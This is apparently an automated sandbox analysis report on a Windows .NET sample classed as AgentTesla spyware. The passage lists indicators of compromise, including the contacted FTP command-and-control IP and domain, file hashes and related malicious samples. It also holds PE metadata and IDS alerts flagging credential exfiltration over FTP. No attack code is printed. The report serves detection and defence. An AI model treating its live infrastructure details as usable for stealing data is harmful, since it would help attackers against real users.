http://www.fontbureau.com/designers	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	wKmhzHd4MC.exe, 00000000.00000002.1757453592.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, wKmhzHd4MC.exe, 00000004.00000002.2968931469.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	wKmhzHd4MC.exe, 00000000.00000002.1764276176.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, wKmhzHd4MC.exe, 00000000.00000002.1763856773.0000000005634000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.247.165.99	ftp.normagroup.com.tr	United States		8100	ASN-QUADRANET-GLOBALUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1529975
Start date and time:	2024-10-09 15:50:39 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	wKmhzHd4MC.exe renamed because original name is a hash value
Original Sample Name:	f19d3e7a7e04ba607a9133d1e8aed617bc6d73ca314407b03c9ddfcce51ec3a4.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 72 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: wKmhzHd4MC.exe

Simulations

Behavior and APIs

Time	Type	Description
09:51:37	API Interceptor	2165960x Sleep call for process: wKmhzHd4MC.exe modified
09:51:38	API Interceptor	31x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.247.165.99	hesaphareketi__20241001.exe	Get hash	malicious	AgentTesla	Browse
	EUR Swift Bildirimi12-08-2024.exe	Get hash	malicious	AgentTesla	Browse
	LisectAVT_2403002A_134.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi_____.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi__.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi-.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi-.exe	Get hash	malicious	AgentTesla	Browse
	hesaphareketi-01-pdf.exe	Get hash	malicious	AgentTesla	Browse
	19-03-2024_Takas_Sonuclari.exe	Get hash	malicious	AgentTesla	Browse
	CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ftp.normagroup.com.tr	hesaphareketi__20241001.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	EUR Swift Bildirimi12-08-2024.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	LisectAVT_2403002A_134.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi_____.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi__.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi-.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi-.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	hesaphareketi-01-pdf.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	19-03-2024_Takas_Sonuclari.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99
	CN-Invoice-0945413571-XXXXX6856-2312053735707600000.exe	Get hash	malicious	AgentTesla	Browse	104.247.165.99

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-QUADRANET-GLOBALUS	SWIFT 103 202410071251443120 071024-pdf.vbs	Get hash	malicious	Remcos	Browse	64.188.16.157
	na.elf	Get hash	malicious	Mirai	Browse	162.220.9.69
	fBcMVl6ns6.lnk	Get hash	malicious	RHADAMANTHYS	Browse	104.223.122.15
	rpQF1aDIK4.lnk	Get hash	malicious	RHADAMANTHYS	Browse	104.223.122.15
	test.ps1	Get hash	malicious	RHADAMANTHYS	Browse	104.223.122.15
	path.ps1	Get hash	malicious	DcRat	Browse	104.223.122.15
	n9q8iS3aIJ.elf	Get hash	malicious	Mirai	Browse	156.232.61.110
	1728373206596a852cdbe7ae697de423fbd80cabe33d7a6a584032b72164b61e0692c12d1a849.dat-decoded.exe	Get hash	malicious	Remcos	Browse	64.188.16.157
	SWIFT 103 202410071519130850 071024.pdf.vbs	Get hash	malicious	Remcos	Browse	64.188.16.157
	a5gvJhukP7.exe	Get hash	malicious	Pony	Browse	67.215.225.205

Process:	C:\Users\user\Desktop\wKmhzHd4MC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZLiUyus:fLHxvIIwLgZ2KRHWLOug4Xs
MD5:	3C929F86A4BCF6EA2EF05B32A5282873
SHA1:	B31ACF630E7F284B08F13E3A547C60DB3231D912
SHA-256:	1737438BA668B9A48ED2E86DE3FC8BF4B92F095346F3F42364AC37EC66495EC1
SHA-512:	1129658D9368A8D947C64ABE88D1DEF20FACFC1384A34F362493588A1E8B965F0813608B8A4CBAE128F21EADF23408831608D9E8BF7AEA4365EE762D94B718AB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx14kgao.zu4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_poe4perv.5q2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwip5pf4.4as.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tmvh2zmg.ghe.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.790303023864724
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	wKmhzHd4MC.exe
File size:	843'264 bytes
MD5:	38c9e1cf0e8f09bb1db22c49a68fc9b1
SHA1:	3477f20664e2fadde22a6f5d4d96ddbf0a1a6acd
SHA256:	f19d3e7a7e04ba607a9133d1e8aed617bc6d73ca314407b03c9ddfcce51ec3a4
SHA512:	0d3c2569f44d0a9df80bf8e081ef7cba3d20758c431a25d4e205b9a4db31f9db571a23709a768daffbcd526a295806ff6a06fa4410b04f97ad13dd386250ea99
SSDEEP:	12288:38rnrixlaE11WJf4IpuZwrJlxJoUpd0cbXuUj+wyBqTa80udnH2qwgSUu:3g2xla0wJf4SV3r0c/+wyoGgVu
TLSH:	01050141363DAF12D4B047F50872D1B557F9BE9EA821E71A0EC23DDB383AF444A51A8B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............0......"......r.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	0f08caa5c4da180f

Static PE Info

General

Entrypoint:	0x4cd872
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0B8AB [Mon Sep 23 00:39:07 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xcd820	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xce000	0x1fe4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xcb878	0xcba00	7db3cd47926716f8a90ef61efb7ceaeb	False	0.8921213167587477	data	7.795735021973012	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xce000	0x1fe4	0x2000	38296fccc7233759251a37a5d9502167	False	0.8955078125	data	7.484795943677099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0xc	0x200	37a794dd6c52be35779288e87621c04f	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xce0c8	0x1bd8	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9667508417508418
RT_GROUP_ICON	0xcfcb0	0x14	data	1.05
RT_VERSION	0xcfcd4	0x30c	data	0.43205128205128207

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-09T15:51:44.858745+0200	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.4	49733	104.247.165.99	21	TCP
2024-10-09T15:51:45.488591+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49736	104.247.165.99	55462	TCP
2024-10-09T15:51:45.494271+0200	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.4	49736	104.247.165.99	55462	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 9, 2024 15:51:41.141052008 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:41.146481037 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:41.146538019 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:42.141299963 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:42.342519999 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:42.344523907 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:42.985353947 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:43.014903069 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:43.019834995 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:43.251539946 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:43.251683950 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:43.256546974 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:43.924839020 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:43.925066948 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:43.925925970 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:43.925986052 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:43.930186987 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.150084972 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.150286913 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:44.155323029 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.383707047 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.383884907 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:44.389127970 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.614674091 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.615011930 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:44.619810104 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.852447033 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.853339911 CEST	49736	55462	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:44.858560085 CEST	55462	49736	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:44.858659983 CEST	49736	55462	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:44.858745098 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:44.863679886 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:45.488126040 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:45.488590956 CEST	49736	55462	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:45.488661051 CEST	49736	55462	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:45.493513107 CEST	55462	49736	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:45.494209051 CEST	55462	49736	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:45.494271040 CEST	49736	55462	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:45.531877041 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:51:45.716684103 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:51:45.766324997 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:15.328044891 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:15.332956076 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:15.555639029 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:15.556211948 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:15.561474085 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:15.561554909 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:15.561635017 CEST	49733	21	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:15.566612005 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.177823067 CEST	21	49733	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.178055048 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.182931900 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.182957888 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.182987928 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.183005095 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.183024883 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.183033943 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.183060884 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.183079958 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.183089972 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.183136940 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.183212042 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.183221102 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.183228970 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.183258057 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.183276892 CEST	49907	53292	192.168.2.4	104.247.165.99
Oct 9, 2024 15:53:16.183326960 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.183336020 CEST	53292	49907	104.247.165.99	192.168.2.4
Oct 9, 2024 15:53:16.183389902 CEST	49907	53292	192.168.2.4	104.247.165.99
